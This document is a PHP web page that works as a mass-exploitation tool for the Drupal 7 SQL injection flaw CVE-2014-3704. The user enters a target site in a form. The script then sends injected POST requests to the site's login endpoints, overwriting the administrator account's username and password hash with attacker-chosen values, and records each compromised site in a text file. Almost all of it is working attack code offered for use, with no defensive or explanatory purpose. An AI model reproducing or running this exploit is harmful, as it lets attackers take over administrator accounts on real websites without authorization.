Exploiter Rce Drupal

1. <?php ?> <!Doctype HTML>
2. <html>
3. <head>
4. <title>Drupal Exploit</title>
5. <body>
6. </head>
7. <body>
8. <div class="mymargin">
9. <center>
10. <font color="red"><h1>Drupal Exploit</h1></font>
11.  
12. <form method="GET" action="">
13. Site : <input type="text" name="url" placeholder="Example: www.site.com">
14. <input type="submit" name="submit" value="suck it !">
15. </form>
16. <br>
17. <?php
18. #-----------------------------------------------------------------------------#
19. # Exploit Title: Drupal core 7.x - SQL Injection #
20. # Date: Oct 16 2014 #
21. # Exploit Author: Dustin D&#1043;rr #
22. # Software Link: http://www.drupal.com/ #
23. # Version: Drupal core 7.x versions prior to 7.32 #
24. # CVE: CVE-2014-3704 #
25. #-----------------------------------------------------------------------------#
26. $file = fopen("rock-you.txt", "a");
27. error_reporting(0);
28. if (isset($_GET['submit'])) {
29. $url = "http://" . $_GET['url'];
30. $post_data = "name[0;update users set name %3D 'fuckyou' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
31. $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
32. ", 'content' => $post_data));
33. $ctx = stream_context_create($params);
34. $data = file_get_contents($url . '/user/login/', null, $ctx);
35. echo "<h4>Scanning at \"/user/login/</h4>\"";
36. if ((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) || (stristr($data, 'FcUk Crap') && $data)) {
37. $fp = fopen("rock-you.txt", 'a');
38. echo "Success! User:fuckyou Pass:admin at {$url}/user/login <br>";
39. echo '<font color="#00FF66">Finished scanning. check => </font><a href="rock-you.txt" target="_blank">Rock You </a></font> ';
40. fwrite($fp, "Succes! User:fuckyou Pass:admin -> {$url}/user/login");
41. fwrite($fp, "
42. ");
43. fwrite($fp, "======================================Donnazmi==============================================================");
44. fwrite($fp, "
45. ");
46. fclose($fp);
47. } else {
48. echo "Error! Either the website isn't vulnerable, or your Internet isn't working.";
49. }
50. }
51. if (isset($_GET['submit'])) {
52. $url = "http://" . $_GET['url'] . "/";
53. $post_data = "name[0;update users set name %3D 'fuckyou' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=test3&name[]=Crap&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
54. $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
55. ", 'content' => $post_data));
56. $ctx = stream_context_create($params);
57. $data = file_get_contents($url . '?q=node&destination=node', null, $ctx);
58. echo "<h4>Scanning at \"Index</h4>\"";
59. if (stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
60. $fp = fopen("rock-you.txt", 'a');
61. echo "Success! User:fuckyou Pass:admin at {$url}/user/login <br>";
62. echo '<font color="red">Finished scanning. check => </font><a href="rock-you.txt" target="_blank">Rock you !</a></font> ';
63. fwrite($fp, "Success! User:fuckyou Pass:admin -> {$url}/user/login");
64. fwrite($fp, "
65. ");
66. fwrite($fp, "======================================Donnazmi==============================================================");
67. fwrite($fp, "
68. ");
69. fclose($fp);
70. } else {
71. echo "Error! Either the website isn't vulnerable, or your Internet isn't working.";
72. }
73. }
74. ?>
75. <br>
76. </div>
77.  
78. </body>
79. </html>